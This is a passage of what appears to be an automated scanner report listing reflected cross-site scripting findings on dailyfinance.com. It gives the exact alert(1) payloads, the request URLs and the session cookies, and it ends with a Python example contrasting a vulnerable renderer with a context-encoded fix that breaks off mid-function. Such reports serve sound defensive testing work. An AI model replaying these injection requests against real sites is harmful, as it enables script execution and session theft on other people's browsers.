<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Quote, News & Summar ...[SNIP]... <input value="USDCHF616DA"><SCRIPT>ALERT(1)</SCRIPT>813BD4458E2" id="navsearch_field" name="sym" class="search" maxlength="25" alt="Enter a symbol here" type="text" /> ...[SNIP]...
1.408. http://www.dailyfinance.com/search/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b1a9"-alert(1)-"1608cc5b7c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?8b1a9"-alert(1)-"1608cc5b7c9=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.409. http://www.dailyfinance.com/spotlight/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /spotlight/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3784f"-alert(1)-"99cb81ed7c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spotlight/?3784f"-alert(1)-"99cb81ed7c9=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.410. http://www.dailyfinance.com/stock-charts/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /stock-charts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c66b8"-alert(1)-"ae6ab4737ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stock-charts/?c66b8"-alert(1)-"ae6ab4737ab=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.411. http://www.dailyfinance.com/stock-quotes/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /stock-quotes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f36b5"-alert(1)-"dd3a91f6965 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stock-quotes/?f36b5"-alert(1)-"dd3a91f6965=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.412. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a02"-alert(1)-"2ac6c1f81b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/autos/should-america-be-driving-on-natural-gas/19824562/?a7a02"-alert(1)-"2ac6c1f81b1=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.413. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfcb4"><script>alert(1)</script>945913d4cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/autos/should-america-be-driving-on-natural-gas/19824562/?dfcb4"><script>alert(1)</script>945913d4cd0=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/?dfcb4"><script>alert(1)</script>945913d4cd0=1" rel="nofollow"> ...[SNIP]...
1.414. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f564e"><script>alert(1)</script>53fd07ea6ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?f564e"><script>alert(1)</script>53fd07ea6ec=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?f564e"><script>alert(1)</script>53fd07ea6ec=1" rel="nofollow"> ...[SNIP]...
1.415. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665a8"-alert(1)-"dfaa618585f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?665a8"-alert(1)-"dfaa618585f=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.416. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f86a"-alert(1)-"2392dda0435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/apple-steve-jobs-succession/19828506/?4f86a"-alert(1)-"2392dda0435=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.417. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6883"><script>alert(1)</script>e3666f89f36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/apple-steve-jobs-succession/19828506/?f6883"><script>alert(1)</script>e3666f89f36=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/?f6883"><script>alert(1)</script>e3666f89f36=1" rel="nofollow"> ...[SNIP]...
1.418. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dbe"><script>alert(1)</script>f81355318f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?68dbe"><script>alert(1)</script>f81355318f1=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?68dbe"><script>alert(1)</script>f81355318f1=1" rel="nofollow"> ...[SNIP]...
1.419. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98409"-alert(1)-"2007987fd31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?98409"-alert(1)-"2007987fd31=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.420. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f128c"><script>alert(1)</script>a9e75a07df5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?f128c"><script>alert(1)</script>a9e75a07df5=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?f128c"><script>alert(1)</script>a9e75a07df5=1" rel="nofollow"> ...[SNIP]...
1.421. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20110"-alert(1)-"b71af96c414 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?20110"-alert(1)-"b71af96c414=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.422. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da6e9"><script>alert(1)</script>900503f19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?da6e9"><script>alert(1)</script>900503f19b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?da6e9"><script>alert(1)</script>900503f19b=1" rel="nofollow"> ...[SNIP]...
1.423. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4597"-alert(1)-"f5fb9d7c0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?d4597"-alert(1)-"f5fb9d7c0db=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.424. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93be4"><script>alert(1)</script>50deeeb9f65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?93be4"><script>alert(1)</script>50deeeb9f65=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?93be4"><script>alert(1)</script>50deeeb9f65=1" rel="nofollow"> ...[SNIP]...
1.425. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6223c"-alert(1)-"3957c211126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?6223c"-alert(1)-"3957c211126=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create
...[SNIP]...
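The remediation detail for this finding says to avoid echoing user data into a script context at all; where the page URL really must reach both the href attribute and the inline script, each sink needs encoding for its own context, and the query string itself should be rebuilt rather than copied. The following is an added example, not code from the report or from the site: the server-side code that produced these responses is not shown, so render_vulnerable() is an assumed reconstruction of the behaviour (raw request URI pasted into an href and into a JavaScript string literal), and render_hardened() is the corrected form beside it.

```python
"""Vulnerable rendering beside a context-aware fix for the two reflection points in the report."""
import html
import json
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

HOST = "www.dailyfinance.com"
STORY = "/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/"
# Parameter names from the report: the whole name is attacker-controlled, the value is just 1.
ATTR_NAME = '93be4"><script>alert(1)</script>50deeeb9f65'
JS_NAME = '6223c"-alert(1)-"3957c211126'
ATTR_URI = STORY + "?" + ATTR_NAME + "=1"
JS_URI = STORY + "?" + JS_NAME + "=1"


def render_vulnerable(request_uri: str) -> str:
    """Assumed reconstruction: raw URI into both contexts. The attribute payload closes href
    and the <a> tag; the JS payload turns the literal into  "..." - alert(1) - "..."  which runs."""
    page_url = "http://" + HOST + request_uri
    return (
        f'<a name="aol-addthis" href="&body={page_url}" rel="nofollow">Share</a>\n'
        f'<script>var pageUrl = "{page_url}";</script>'
    )


def canonical_page_url(request_uri: str) -> str:
    """Rebuild the URL from parsed parts so every parameter name and value is percent-encoded;
    '"', '<', '>' and '/' inside a name cannot survive into the output."""
    parts = urlsplit(request_uri)
    query = urlencode(parse_qsl(parts.query, keep_blank_values=True))
    return urlunsplit(("http", HOST, parts.path, query, ""))


def js_string_literal(value: str) -> str:
    """A JSON string is a valid JS string literal; escaping '/' too means a '</script>' inside
    the value can never close the surrounding script block."""
    return json.dumps(value).replace("/", "\\/")


def render_hardened(request_uri: str) -> str:
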